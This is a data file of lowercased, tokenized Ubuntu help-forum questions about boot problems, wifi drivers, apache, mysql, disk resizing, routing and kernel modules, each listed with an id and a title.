433538	bootmgr is missing , dual boot on two disk drives	i was first using windows 7 then i tried ubuntu 13.10 . it was good . then i wanted to try boss ( bharat operating system solutions ) linux , but it did n't install . till then i had formatted my two disk drives . then when i wanted to go back to windows . it started for once , then it did n't start . i used boot repair for a whole night , then using windows install dvd i again installed windows 7 . i want to install ubuntu in dual boot again from a usb stick , but it displays this error message : bootmgr is missing press alt+ctrl+del to restart it only displays the above message when i have set the usb stick first in the bios boot order . the same message also appears for the boot repair disk . otherwise when i boot from the hard disk , there is no problem with booting windows 7 . i have already checked the steps i followed when i made the ubuntu usb stick . i visited the ubuntu usb stick instructions page and i followed the same steps there , but the same problem persists . please help .
433539	intel 7260 works during installation but not after reboot	before you hit dupe : i 've already attempted the steps listed in no wireless for intel corporation 7260 version 63 question . i have the proper microcode loaded into /lib/firmware and i 'm running kernel version 3.11 . i 'm having some issues with a completely fresh install of kubuntu 13.10 : my wireless card works on the live usb ( created with unetbootin ) but on the installed system the driver fails to load and gives a backtrace with error failed to probe ( hw address ? ) with error -12 . does anyone have any ideas or suggestions ? google is coming up dry . from kern.log ( 10 finger interface , so some information omitted ) : -- - [ cut here ] -- - warning cpu : 10 pid : 302 at /build/buildd/linux-3.11.0/drivers/net/wireless/iwlwifi/pcie/rc.x:1059 iwl_pcie_alloc_ict+0x1cb/0x210 [ iwlwifi ] ( ) modules linked in : iwlwifi ( + ) parport_pc psmouse cfg80211 ppdev serio_raw snd_hda_codec_realtek snd_hda_intel ( + ) bnep rfcomm snd_hda_codec bluetooth snd_hwdep lpc_ich snd_pcm snd_page_alloc snd_seq_midi ( and many others ) cpu : 10 pid : 302 comm : kworker/10:1 tainted : gf 3.11.0-18-generic # 32-ubuntu hardware name : asustek computer inc. z9pe-d8 ws/z9pe-d8 ws , bios 5304 11/18/2013 workqueue : events work_for_cpu_fn ( 12 memory addresses here , 1st , 4th and 10th are very small , 4th is nil ) call trace : [ address ] dump_stack+0x45/0x56 [ address ] warn_slowpath_common+0x7d/0xa0 [ address ] warn_slowpath_null+0x1a/0x20 [ address ] iwl_pcie_alloc_ict+0x1cb/0x210 [ address ] iwl_trans_pcie_alloc+0x26a/0x400 [ address ] iwl_pci_probe+0x1d/0xc0 ( 9 trace entries omitted ) -- - [ end trace ( address ) ] -- - iwlwifi : probe of 0000:84:00.0 failed with error -12 lspci : 84:00.0 network controller : intel corporation wireless 7260 ( rev 04 ) lsmod : iwlwifi 165636 0 cfg 80211 480503 1 iwlwifi dmesg | grep 84:00 pci 0000:84:00.0 : [ 8086:08b1 ] type 00 class 0x028000 pci 0000:84:00.0 : reg 0x10 : [ mem 0xfb100000-0xfb101fff 64bit ] pci 0000:84:00.0 : pme # supportd from d0 d3hot d3cold pci 0000:84:00.0 : signaling pme through pcie pme interrupt iwlwifi 0000:84:00.0 : ca n't disable aspm ; os does n't have aspm control iwlwifi 0000:84:00.0 : irq 133 for msi/msi-x iwlwifi : probe of 0000:84:00.0 failed with error -12 dmesg | grep iwl iwlwifi 0000:84:00.0 : ca n't disable aspm ; os does n't have aspm control iwlwifi 0000:84:00.0 : irq 133 for msi/msi-x warning cpu : 10 pid : 302 at /build/buildd/linux-3.11.0/drivers/net/wireless/iwlwifi/pcie/rc.x:1059 iwl_pcie_alloc_ict+0x1cb/0x210 [ iwlwifi ] ( ) modules linked in : iwlwifi ( + ) parport_pc psmouse cfg80211 ppdev serio_raw snd_hda_codec_realtek snd_hda_intel ( + ) bnep rfcomm snd_hda_codec bluetooth snd_hwdep lpc_ich snd_pcm snd_page_alloc snd_seq_midi ( and many others ) [ address ] iwl_pcie_alloc_ict+0x1cb/0x210 [ address ] iwl_trans_pcie_alloc+0x26a/0x400 [ address ] iwl_pci_probe+0x1d/0xc0 iwlwifi : probe of 0000:84:00.0 failed with error -12 dmesg | grep -i error ioapic : probe of 0000:00:05.4 failed with error -22 ioapic : probe of 0000:80:05.4 failed with error -22 erst : error record serialization table ( erst ) support is initialized . nouveau : probe of 0000:04:00.0 failed with error -22 nouveau : probe of 0000:83:00.0 failed with error -22 iwlwifi : probe of 0000:84:00.0 failed with error -12 ext4-fs ( sda1 ) : re-mounted . opts : errors=remount-ro lsmod | grep iwl iwlwifi 165636 0 cfg80211 480503 1 iwlwifi same command after modprobeing iwlmvm : iwlmvm 161339 0 mac80211 597268 1 iwlmvm iwlwifi 165636 1 iwlmvm cfg80211 480503 3 iwlwifi , mac80211 , iwlmvm however , i still do n't have wlan0 if my ifconfig and iwconfig returns nothing interesting after modprobe cat /etc/modprobe.d/iwlwifi.conf matches the version pasted in chili555 's answer below . below this line are samples of it working within the installer . dmesg | grep iwl iwlwifi 0000:84:00.0 : ca n't disable aspm ; os does n't have aspm control iwlwifi 0000:84:00.0 : irq 132 for msi/msi-x iwlwifi 0000:84:00.0 : loaded firmware version 22.0.7.0 op_mode iwlmvm iwlwifi 0000:84:00.0 : detected intel ( r ) dual band wireless ac 7260 , rev=0x144 iwlwifi 0000:84:00.0 : l1 disabled ; enabling l0s iwlwifi 0000:84:00.0 : l1 disabled ; enabling l0s iwlwifi 0000:84:00.0 : ieee80211 phy0 : selected rate control algorithm 'iwl-mvm-rs' iwlwifi 0000:84:00.0 : l1 disabled ; enabling l0s iwlwifi 0000:84:00.0 : l1 disabled ; enabling l0s lspci | grep 84:00 : 84:00.0 network controller : intel corporation wireless 7260 ( rev 73 ) ( detected different revision ( ? ! ) ) installer is using kernel 3.11.0-12-generic , installed system is running kernel 3.11.0-18-generic thanks in advance for your time .
433543	compilervars.sh permission denied	whenever i am opening a terminal or new tab , i am getting one line append in my terminal '' bash : /etc/security/checks/pubkeys/memvirt/intel/bin/compilervars.sh : permission denied `` ! [ enter image description here ] [ 1 ] can someone help me how to fix it .
433545	how to display quota info on lock screen ?	is it possible to display user quota info on lock screen or any message at least ? because every time user lock in or unlock the first window he/she will look at is going to be lock screen .
433548	how to access the executable file from server on client machine	i have two machines : one with ubuntu 12.04 server and another with ubuntu 12.04 client . i am having some software installed on ubuntu server machine . i need to use this software on client machine without installing . while performing ssh and accessing executable file i got error showing sorry , but you can not execute command from remote site this is disabled due to security consideration help me to access the executable file from server on client machine..
433550	referring a source pydev project to another pydev project fails in eclipse	how to give reference from one source pydev project to another destination pydev project . i tried to remove the .pyc files from the referring project , it also fails . later i tried after giving the reference i restarted the eclipse , this also fails . can any one solve this issue ?
433552	how to block facebook for particular time intervals in ubuntu server ?	how can i block facebook for particular time intervals in ubuntu server ? can anyone help me .
433562	how to use my 6gb of free ram to optimize ubuntu12.04 ?	i also want to load faster on boot . if possible , can i shift all temp file hard disk operation to ram ?
433567	internet connection fails with japanese provider	i ve got the following situation here . i am in japan my girlfriend signed an internet contract with ntt `` flet '' and i want to connect to that before my neighbour finds out how to set up a password on his wifi . i am using ubuntu , and the guy on the service line never heard of ubuntu before . i ve got some kind of router that doesnt even have a reset button . i followed the companys instruction until it came up to insert and install a cd , which is of course not working for ubuntu . i tried to manually edit the dsl but it only comes up again and again asking me the login data , password etc . and doesnt connect in the end . obviously it keeps trying to connect . each 30 sec i get a popup saying that the wired internet is disconnected . this however just happened after i followed a link among the replies here that stated this command might work . sudo nano /etc/networkmanager/networkmanager.conf change the line managed=false to managed=true save , stop and start network manager : sudo service network-manager restart . which it didn't that s what i get for ifconfig moe @ moe-dynabook-t552-36fk : ~ $ ifconfig -a eth0 link encap : ethernet hwaddr 00:26:6c:1f:4b : f1 inet6 addr : fe80 : :226:6cff : fe1f:4bf1/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:494 errors:0 dropped:0 overruns:0 frame:0 tx packets:2584 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:43700 ( 43.7 kb ) tx bytes:492816 ( 492.8 kb ) interrupt:16 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:3594 errors:0 dropped:0 overruns:0 frame:0 tx packets:3594 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:280473 ( 280.4 kb ) tx bytes:280473 ( 280.4 kb ) wlan0 link encap : ethernet hwaddr 24 : ec:99 : bf:32:26 inet addr:10.0.1.5 bcast:10.0.1.255 mask:255.255.255.0 inet6 addr : fe80 : :26ec:99ff : febf:3226/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:30422 errors:0 dropped:0 overruns:0 frame:0 tx packets:25657 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:33166810 ( 33.1 mb ) tx bytes:4002653 ( 4.0 mb )
433568	windows 8.1 uninstall ubuntu	im am very new to ubuntu ( and linux in general ) . i downloaded it onto a cd to use on a different computer , and now i want it off my main computer . when i started it up , i was prompted with the option of either running windows 8.1 or ubuntu . i do not want ubuntu at all . can i just search for ubuntu on my computer , select them , and hit the delete key ? i do n't even know if my driver is partitioned . it says
433572	apache not restarting	i am new to linux commands . i have ubuntu 12.04 installed on my server . today i tried to install zpanelcp on my server . no thing is working after i installed it . site is down . i tried to restart apache but it gives following error root @ c27-76 : ~ # sudo service apache2 restart apache2 : syntax error on line 238 of /etc/apache2/apache2.conf : could not open configuration file /etc/zpanel/configs/apache/httpd.conf : no such file or directory action 'configtest ' failed . the apache error log may have more information . ... fail ! my /etc/zpanel/configs/apache/httpd.conf file is blank . please suggest me how can i fix it . thanks in advance
433575	how to install and configure dynamic vlan server ?	i have below setup : firewall : fortinet 240d core switches are 2 one is juniper ex 4200 & second one is ex 3300 i want to configure dynamic vlan server on ubuntu linux 12.04.3 kernel and cpu : linux 3.8.0-32-generic on i686 i have confirmed with junniper technical support that ex3300 & ex4200 supports 802.1x authentication . can anyone suggest which is the best software / package / or something like that i can install and get good/reliable documentation on installation/configuration and troubleshooting please suggest the best one as i do not have any specific in my mind but it would be great if it can be managed through some web portal that comes with it or can be managed from webmin .
433576	unable to complete sudo apt-get update	i have just installed ubuntu 12.0.4 lts ( precise pangolin ) . i tried to run sudo apt-get update on shell and it ends up with following errors after couple of seconds : err http : //pk.archive.ubuntu.com precise release.gpg could not connect to pk.archive.ubuntu.com:80 ( 58.65.218.244 ) , connection timed out w : failed to fetch http : //pk.archive.ubuntu.com/ubuntu/dists/precise-backports/release.gpg unable to connect to pk.archive.ubuntu.com : http : w : some index files failed to download . they have been ignored , or old ones used instead .
433577	mysql data provider for tora	i was a mysql query browser user in windows . i switched to ubuntu 13.10 and now i ca n't get mysql query browser so i tried tora referenced from mysql gui tools now i could not get any option in connection provider : it 's like disabled not showing mysql db when i hit new connection it says no available connection provider how to get connection provider in tora ?
433588	upgrade or re-install on external hard drive ?	i have ubuntu version ( 12 something i forgot ) installed in my external hard disk long ago and i did not use it for quite some time . recently i wish to use it and it says that an upgrade is needed . so i followed all the instructions but however , some of the update is not complete ( i think ) and it keeps giving me this message like system problem was detected . i wish to make a clean install of the latest version of ubuntu , how should i do it ? provided that i am running ubuntu on an external hard disk ? kindly advice , i am pretty much clueless when it comes to computer stuff .
433591	how can i get windows files from ubuntu	is it possible to get the files i had on windows onto my ubuntu desktop ? how can i connect to windows partition from ubuntu ?
433592	how does linux handle a move command	how does linux handle a move command under the hood ? let 's say i move my home dir /home/me and i move this into another directory /home/foo/me how are all the files and directories paths under me changed ? i know my desktop dir under me is now /home/foo/me/desktop as well as documents /home/foo/me/documents but does the file system explicitly update every path under me to to reflect the change ? that does n't sound very efficient and it 's probably not this . where can i get more information on this ?
433602	ca n't `` compile '' the makefile	this is the make file : obj-m += hello_pass_arg.o kdir = /lib/modules/ $ ( shell uname -r ) /build all : $ ( make ) -c $ ( kdir ) subdirs= $ ( pwd ) modules clean : rm -rf *.o *.ko *.mod . * *.symvers *.order when i execute the command `` make '' i shows the following error : make -c /lib/modules/3.8.13.14-qd/build subdirs=/usr/src/linux-headers-3.8.13.14-qd/drivers/hello modules make [ 1 ] : entering directory `/root/source/linux-lts-raring-3.8.0' make [ 2 ] : *** no rule to make target `/usr/src/linux-headers-3.8.13.14-qd/drivers/hello/hello_pass_arg.c ' , needed by `/usr/src/linux-headers-3.8.13.14-qd/drivers/hello/hello_pass_arg.o ' . stop . make [ 1 ] : *** [ _module_/usr/src/linux-headers-3.8.13.14-qd/drivers/hello ] error 2 make [ 1 ] : leaving directory `/root/source/linux-lts-raring-3.8.0' make : *** [ all ] error 2 i dont understand why does it enter linux-lts-raring-3.8.0 !
433606	can i install ubuntu in sd3 ?	i was using windows 7 some days ago . accidentally , a magnet touched the hdd of my laptop . after few seconds , i got blue screen saying crash dumping bla bla . i shutdown my computer and when i started it , it says automatic repair ... and the there was nothing . i put my ubuntu live cd to see if i could format the hdd , under devices , i could only open the z drive ( /dev/sda3 ) and the system reserved . i think , the magnet has deleted the files from sda2 . so , i just want to know if it 's possible to install ubuntu in sd3 and make it bootable .
433609	how can i list all applications installed in my system ?	i know , i just can hit super+a to see all installed apps in ubuntu , but i need a command to list their names . the command dpkg -- get-selections | awk ' { print $ 1 } ' is also not an option because it shows all installed packages and it contains drivers , kernels and libraries .
433612	ubuntu 13.10 does n't boot up	i have downloaded the iso file and copied on a usb drive i have made a live usb i have changed the boot order ubuntu loads but after loading system stucks on a blank screen ( on both trying and installing ) md5sum has verified the hash key what should i do now ?
433613	gedit:3457 error : not using units is deprecated . assuming 'px '	i have an error with my first application which i do n't understand : ( gedit:3457 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:1971:11 : not using units is deprecated . assuming 'px ' . ( gedit:3457 ) : gtk-warning ** : failed to parse /usr/share/themes/mac-os-lion-theme-v2/gtk-3.0/settings.ini :
433615	how to create a kconfig file	so i have a hello world module and a makefile for it . i want the module to be shown in the make menuconfig window ! how do i do that ? by creating a new kconfig file or something ? if so , how to create a new kconfig file ?
433617	how to share virtualbox windows xp guest 's internet connection with ubuntu 13.10 host ?	i 'm using ubuntu 13.10 with windows xp sp3 installed as a virtual machine , the only way for me to access the internet is using a ppp broadband usb modem ( dwm-156 ) i am not able to run it in ubuntu , i managed to install it on xp and get it to work but i do n't know how to share that connection with ubuntu . i googled it and not found any working workaround for me . i tried all types of `` attached to : '' settings on my guest os , but no success ( perhaps there is more settings that i did not ) . i 'm not an expert , so please explain your answer in step-by-step approach . could someone shows me an easy way to do that ? thanks !
433623	how can i add a wine launcher to the wine desktop ?	you may or may not know that wine has a `` desktop mode '' where it renders a virtual desktop in a window and renders all its windows within that desktop . you can access it through : wine explorer /desktop=arbname,1920x1200 `` c : \ ... \ ... \application.exe '' it 's really helpful for `` fullscreen '' gaming on multi-monitor setups . anyway , i 've been using desktop mode for my main wine prefix for years and some applications have ( with no interaction from me ) installed icons on the virtual desktop : there 's something i am used to launching from a terminal after starting my wine desktop but it occurs to me that i might be able to create a launcher for it within the wine desktop - it 's just that i have no idea where to start . where are these launchers stored ? how do i create a new one ? pre-post-edit : i 've found where they live : ~/.wine/drive_c/users/public/desktop/ but all the .lnk files are binary horribleness . great idea microsoft , thanks for that . any ideas how i can create a new one ? note : i am not asking how to create a shortcut to a wine app on my ubuntu desktop .
433636	how to purge my deleted files	i had un-installed a package and deleted all of its files/directories . but still when i locate the package , i can find the deleted files in list while in actual they are not present . i cant access those deleted directories nor can access its config files in /etc . i gave my server a restart but did n't helped .
433637	how to upload & download file using hbase ?	i want to fragment the file & download & upload file using hbase .
433640	nvidia 331.49 installaton on p151em1 clevo ( with dual-boot ubuntu 13.10 )	( apologies for the possibly confusing title ) here is the situation : i have ubuntu 13.10 installed on my p151em1 clevo laptop ( gtx670mx ) ( dual boot with w7 ) . i 'm trying to update the drivers to version 311.49 , but i am constantly running into strange issues . installed manually ( via .run download from nvidia 's site ) , ended up with a black screen and a black `` x '' as a cursor , after the `` ubuntu '' loading screen appears . ( installing via the ctrl+alt+f1 terminal ) . installed via the xorg-edgers ppa , ended up with the same issue ( black screen and black `` x '' as cursor ) . my ubuntu 13.10 is pretty much a new installation , it is fully updated too . only additional thing i have installed is openjdk 7 jre . note : i 'm new at trying to do this ( first time seriously considering using ubuntu for any of my games that support it , example : minecraft . which runs perfectly fine yet it uses the onboard hd4000 which is n't ideal . making it run worse than in windows 7 ) .
433642	lightdm configuration files	i have an xubuntu installation that uses lightdm that for some reason unkown to me went gabooey yesterday - black screen with just the mouse pointer on booting . ( tty 's still working . ) after much reading i 've reinstalled lightdm and now i get to the xubuntu splash screen but no further . /var/log/lightdm/lightdm.log reports : debug : seat : failed to find session configuration xubuntu and debug : seat : failed to find session configuration lightdm-gtk-greeter-ubuntu can someone tell me exactly what files lightdm is looking for and where it is looking for them ? there are .conf files with those names in /etc/lightdm , i 've also tried copying them to other folders i 've seen mentioned in posts . i 've also tried adding specific xsessions-directory and xgreeters-directory options to lightdm.conf but nothing seems to work . any suggestions , much appreciated . suds
433644	how can i view file header information ?	i looked at this question mark pdf as adobe pdf and one of the answers says : in my document headers created with libreoffice , the version 1.4 is having fewer header information . what header information is this and how can i view it ? for all type of files if possible .
433645	forgot to add swap memory during installation	in my ignorance i did n't add swap memory to my install . so my question is , can i work without it and if not how can i add it to my existing install ? love to get some feedback !
433648	( solve ) connecting ubuntu server 12.04 to public network ( internet access )	i have installed ubuntu server 12.04 on my computer . i want to setup my dedicated server for web server and also i already have my own domain for web hosting company . i followed these instructions to install ubuntu server 12.04 . i just setup my server connect with a router and the router connect to internet . that problem is i ca n't access my server from a public network . i already tried this way , and made forward port 80 in my router but it 's still not working . output ifconfig [ eth0 link encap : ethernet hwaddr 00:1f:29 : d8 : ab : e4 inet addr:192.168.0.117 bcast:192.168.0.255 mask:255.255.255.0 ] is there any way to connect my server to the internet ? i found the anwers for my problem . so i just need to forward port 80 in my routers . now i can access my server using internet network .
433655	mysql usage and upgrade	i am using the 11.04 version of kubuntu . is the mysql is already installed in it as i am not able to install the new version of the mysql . and getting the errors reading package lists ... done building dependency tree reading state information ... done e : unable to locate package mysql-server and it show that /etc/mysql bash : /etc/mysql : is a directory **s -l /usr/bin/mysql -rwxr-xr-x 1 root root 132028 2011-02-04 00:07 /usr/bin/mysql in the green is the older version of the mysql is present as it shows the various options when execting the command mysqld -- verbose -- help when i run the command apt -get update it will show the no updates present is the older version of the mysql is present in the system and if yes how to configure it and use it and if not then what is the procedure to install the new version plz help thanks in advance ... **
433656	camera movies will not play	i have recoded video footage on my fuji x-s1 camera , which plays back fine on the actual camera , but when transferred to my computer , running ubuntu 12.04 , the movie files will not play . photographs taken on the same camera view fine , it is just the movies . can anyone assist in this please ?
433657	increase space for ubuntu server on virtualbox	i am running ubuntu server in virtualbox ( i am on a mac ) as a web development server . my mysql server has stopped starting ( and wont start ) and i highly suspect it is because i have no disk space left so i am trying to increase the space available . i used the disk resizer utility ( vboxmanage modifyhd ubuntu\ server.vdi -- resize 80000 ) to increase the disk size and then i booted into ubuntu live and , using gparted , created a new 30gb partition . i made it an ext2 filesystem . but when i boot i first see that this has n't helped : and here is the output from fdisk -l : i am stuck at this part - how do i now tell my machine that it can use the new space so i do n't get disk space errors ? update : i deleted the 30gb partition i made and tried to just resize but i am unable to use gparted to resize the partition because gparted says lvm2 is not supported ( ? ) :
433661	partitions created after installation is readonly	i am using ubuntu 12.04 . during installation i give only a single partition . after that i created two more partitions using gparted , but the new partitions are totally useless that i can not create a new folder or any other tasks like that . i tried to edit the permissions , but its showing message like only a root user can do it.so feeling exhausted i reverted it back to single partition again.can someone me with this . i need to create two useful partitions .
433662	help with my printer ricoh_aficio_sp_c240sf	i 'm trying to configure this printer into my ubuntu 12.04 . i 'm using cups but this specific model is n't supported and i do n't find the driver ppd file in any place . could you help me or give another solution to configure the printer ? thanks a lot ! !
433665	ubuntu usb with fully installed version	i 'm looking for a way to have a fully functional usb with programms i 'd like to install ( e.g.dropbox ) i can only find live usb with the option to add a persistent partition . however , there 's no option visible ( to me ) i can change the location to install certain applications . how can i do this ? i 've downloaded the most recent ubuntu version via pendrivelinux
433668	how can i uninstall oracle java 8 and install oracle java 7 instead with webupd8 installer ?	i installed oracle java 8 by typing in terminal : sudo add-apt-repository ppa : webupd8team/java sudo apt-get update < br/ > sudo apt-get install oracle-java8-installer but now i want to uninstall oracle java 8 and install oracle java 7 instead with sudo apt-get install oracle-java7-installer how can i uninstall java 8 ? which commands should i type in terminal ?
433683	where does the command make search for libraries	i wonder if you can tell me the path make command uses to search for libraries and header files , i 'm getting these errors `` header files missing '' and i wan na check the path manually i have ubuntu 12.04 lts , 2.6.38-16 kernel and gcc version 4.6.3 and i 'm trying to compile this package http : //nrg.cs.ucl.ac.uk/mptcp/mptcp_userland_0.1.tar.gz thank you
433684	my laptop not charging and brightness keys not working after installing ubuntu 12.04.3 lts	i have lenovo ( g-505s ) laptop with per-installed windows 8 . recently i 'm installed ubuntu 12.04 through cd . but after installing my laptop battery not charging and my brightness keys not working in ubuntu which is working perfectly in windows8 ( upgraded to windows 8.1 ) . whenever i plugged out it is showing `` your battery critically low '' then my laptop shutdown and even if i changed brightness in settings there is no difference . i followed the following solutions which appear in ask-ubuntu forum : hibernate dialog apears but does n't hibernate ? kernel patch that solves battery issues when for ubuntu ? ubuntu 13.10 on asus n550j : battery detected and charged , but laptop wo n't work without charger plugged how to control brightness http : //ubuntuforums.org/showthread.php ? t=2139397 & p=12621502 & viewfull=1 # post12621502 how can i make brightness control work ? but none of them working.i updated every command mentioned in those topics and rebooted ( more than 20 times ) but those commands are not working . i formatted my c : / drive again and re-installed ubuntu again but i got the same problem . can any one help me to solve this issue because my laptop just 5 months old and those battery and brightness keys are perfectly working in windows . also i removed my battery 4hours from laptop and inserted again but problem not solved . these are my configurations : lenovo ( g505s ) bios:2.01 mode : legacy amd a8 processor . kernel : 3.2.0.23-generic perhaps , i installed gnome-desktop also to solve this issue but not useful . any suggestions would be really appreciated . thank you ! !
433688	lan network wo n't work in linux but works on windows	i have a question . please forgive if this has already been answered : i am trying to connect some computers to the lan of my office and i found out that the ubuntu 13.10 computers wo n't connect to the lan unless i manually setup a fixed ip number for them . if i connect a windows computer to the same wired network , works with no problems . do you have any idea what this could be happening ? why the automatic dhcp seems to work fine in windows but no in linux ? the computers i 'm using are lenovo thinkcentre edge 72 with ubuntu 13.04 ethernet controler : realtek semiconductor co. , ltd. rt8111/8168 pci express gigabit ethernet controler ( rev 06 ) intel pentium dual-core g2030 ( 3.00ghz ) intel integrated hd graphics 4.0gb pc3-12800 ddr3 sdram 1600 mhz 500gb 7200 rpm
433690	howto link / execute / add to $ path : python3.3.5 after manual installation in 12.04 lts	i 'm trying to install python3.3.5 on /home/myuser/xx , where home is located on a separate partition . i 'm relatively new to linux and have only basic knowledge about installing packages on my own , without the synaptic package manager . here is what i did : i followed the instructions from sergey in this thread . i also used the similar explanation from james nichsolson at this webpage everything worked fine so far except this part : some nice touches to install a py command by creating a symlink : mkdir ~/bin ln -s /opt/python3.3/bin/python3.3 ~/bin/py as i understand it , this is to make python3.3 execuable via the terminal at any place ? so if i write python3.3 it opens . my paths are bit different from the ones in sergeys description : path of python installation : /home/metin/python/python3.3.5 my ./configure command was therefore : ./configure -- prefix=/home/metin/python/python3.3.5 my command to create the link was : ln -s /home/metin/python/python3.3.5/bin/python3.3 problem : after i do this and when i type python3 in my terminal it says this programm is not installed , so something went wrong with creating the link ? further question : where is the difference between creating such a link and adding entries to $ path ? as i understand it ubuntu can access all programs stored in $ path , right ? why should'nt i just ad ... /python3.3.5 to $ path ? so when do i use ln ( links ) and when do i add stuff to $ path . if i want to add dirs to $ path how do i do that easy ? i found some explanations on the internet but i 'm confused . there is the file .bashrc in my /home dir . is that the one were i add such dirs ? because there is also /etc/bash.bashrc and i remember adding path=/home/metin/texlive/2012/bin/x86_64-linux : $ path ; export path manpath=/home/metin/texlive/2012/texmf/doc/man : $ manpath ; export manpath infopath=/home/metin/texlive/2012/texmf/doc/info : $ infopath ; export infopath when i installed texlive since this questions are related i found it logic to put it all in one thread . please let me know if i should rather make more than one post .
433691	how to change gedit embeded terminal plugin colors ?	i am trying to use gedit as an ide for learning c. so far everything is working great but i have this problem : when using ls in its embedded terminal i am unable to see all the files and directories in my workspace directory ( only shows .c files but not the .out and other directories ) , yet when i run terminal from ctrl+alt+t all the files in the current directory show . i ca n't seem to figure out why this is happening , so any ideas would be greatly appreciated . it seems to me that only the colored files are n't showing in the embedded terminal and i need them to show . thank you !
433695	i want to compile a .c file	export cross_compile=~/gcc-linaro/bin/arm-linux-gnueabihf- $ { cross_compile } gcc -o mblast mblast.c when i tried the above commands after the following command : gksudo gedit/home/ahmed/mblast/mblast.c it often gives me : bash : /home/ahmed/gcc-linaro/bin/arm-linux-gnueabihf-gcc : no such file or directory
433698	configure rsnapshot to keep initial ( first ) backup forever ?	how could i tell rsnapshot to keep the initial ( ie. , the very first backup ) backup of my server forever , incase i may need it in some rare time ( like for some files in /etc directory ) ?
433701	port power related function is not calling while the insertion/removal of usb device from usb port	i trying to understanding the usb power manageent , while debugging there is no port power function is called while the insertion/removal of the usb device from the usb port . i am also trying to power off usb port . please help me thanks in advance
433704	what is kernel modding ?	i want to take a dip in customizing linux kernel . as it 's evident that linux kernel can be modified according to our specific needs . my questions are : what is kernel modding ? how to perform that ? is any guide for beginners is available ? i presently have ubuntu 12.04 on my laptop .
433705	/dev/mapper/ubuntu -- vg-root is full	i have just successfully increased my disk size having had help with this question . my set up is ubuntu server running in virtualbox as a web development server . i now have this space : as you can see /dev/mapper/ubuntu -- vg-root is full but i have a a lot more space . how do i go about using the new space to stop disk full errors ? i am not even sure where to start looking so any help is great .
433709	two gateways and two interfaces	i wa n't to configure my ubuntu server as shown below . i need the clients in the 192.168.3.0 network to access internet through gateway 192.168.0.14 , but at the same time i need 192.168.0.13 router to communicate with the server for vpn/apache access ( rules are defined in the router ) from the `` outside world '' . interfaces file : auto lo iface lo inet loopback auto eth0 iface eth0 inet static address 192.168.0.5 netmask 255.255.255.240 network 192.168.0.0 broadcast 192.168.0.15 up ip route add default via 192.168.0.13 dev eth0 metric 100 auto eth1 iface eth1 inet static address 192.168.3.250 netmask 255.255.255.0 network 192.168.3.0 broadcast 192.168.3.255 routing table : kernel ip routing table destination gateway genmask flags metric ref use iface 0.0.0.0 192.168.0.13 0.0.0.0 ug 100 0 0 eth0 192.168.0.0 0.0.0.0 255.255.255.240 u 0 0 0 eth0 192.168.3.0 0.0.0.0 255.255.255.0 u 0 0 0 eth1 this way clients are using only router1 for web access . i 've tried several things , like iproute2 tables ... but with no success . if i change the default gateway to 192.168.0.14 internet access works fine on the clients ( through router 2 ) , but vpn/apache2 access from the web wo n't . thanks
433710	do modifications to sysctl.conf take effect in openvz container ?	i 'm following a security guide ( http : //www.thefanclub.co.za/how-to/how-secure-ubuntu-1204-lts-server-part-1-basics ) to strengthen my openvz based vps webserver running ubuntu 12.04 , a part of that asks to make some modifications to sysctl.conf . but i am not sure if all that really makes sense in an openvz container , as it is a shared kernel . here are the edits that are suggested for sysctl.conf # ip spoofing protection net.ipv4.conf.all.rp_filter = 1 net.ipv4.conf.default.rp_filter = 1 # ignore icmp broadcast requests net.ipv4.icmp_echo_ignore_broadcasts = 1 # disable source packet routing net.ipv4.conf.all.accept_source_route = 0 net.ipv6.conf.all.accept_source_route = 0 net.ipv4.conf.default.accept_source_route = 0 net.ipv6.conf.default.accept_source_route = 0 # ignore send redirects net.ipv4.conf.all.send_redirects = 0 net.ipv4.conf.default.send_redirects = 0 # block syn attacks net.ipv4.tcp_syncookies = 1 net.ipv4.tcp_max_syn_backlog = 2048 net.ipv4.tcp_synack_retries = 2 net.ipv4.tcp_syn_retries = 5 # log martians net.ipv4.conf.all.log_martians = 1 net.ipv4.icmp_ignore_bogus_error_responses = 1 # ignore icmp redirects net.ipv4.conf.all.accept_redirects = 0 net.ipv6.conf.all.accept_redirects = 0 net.ipv4.conf.default.accept_redirects = 0 net.ipv6.conf.default.accept_redirects = 0 # ignore directed pings net.ipv4.icmp_echo_ignore_all = 1 when i tried to test these with my openvz container i got permission denied for 3 of these entries which probably have been locked down by my host . error : permission denied on key 'net.ipv4.tcp_max_syn_backlog' error : permission denied on key 'net.ipv4.tcp_synack_retries' error : permission denied on key 'net.ipv4.tcp_syn_retries' now my question is : does it really make sense to include these to my sysctl.conf in an openvz container environment ? i want to tighten security on my server but i am not really sure if they would take effect in my openvz container .
433716	kubuntu adobe acroread hyperlinks	i 've installed adobe acroread 9.5.5 on my kubuntu system : distributor id : ubuntu description : ubuntu 13.10 release : 13.10 codename : saucy acroreader wo n't follow weblinks - when i hover my mouse over a link , the url is displayed , but clicking it has no apparent effect . i assume acroreader has n't associted the weblinks with my web browser , rekonq : qt : 4.8.4 kde development platform : 4.11.2 rekonq : 2.3.2 how can i fix that ?
433722	ubuntu 13.10 dvd player	ubuntu 13.10 does n't seem to recognize my dvd player but when i check status in terminal it comes up with this - *-cdrom description : dvd-ram writer product : dvdram gsa-t20l vendor : hl-dt-st physical id : 0.0.0 bus info : scsi @ 0:0.0.0 logical name : /dev/cdrom logical name : /dev/sr0 version : nc08 capabilities : removable audio cd-r cd-rw dvd dvd-r dvd-ram configuration : ansiversion=5 status=nodisc it will happily read data discs however . i 've done the usual ubuntu restricted extras and libdvdcss2 and libnavread4 but still nothing . any ideas please .
433727	compiling a c file through gedit extrernal tools	is there any way to compile and run .c files by using a shortcut key using gedit ? i know its possible for java and c++ , and i read somewhere that it is possible to do so using scripts in external tools . i 'm currently compiling my files by gcc -wall name name.c then ./name , but i would like to make this process faster i already tried the below script for my shortcut but it generates an error saying fatal error : no input files # ! /bin/sh echo `` $ gedit_current_document_name '' gcc `` $ gedit_current_codument_name ''
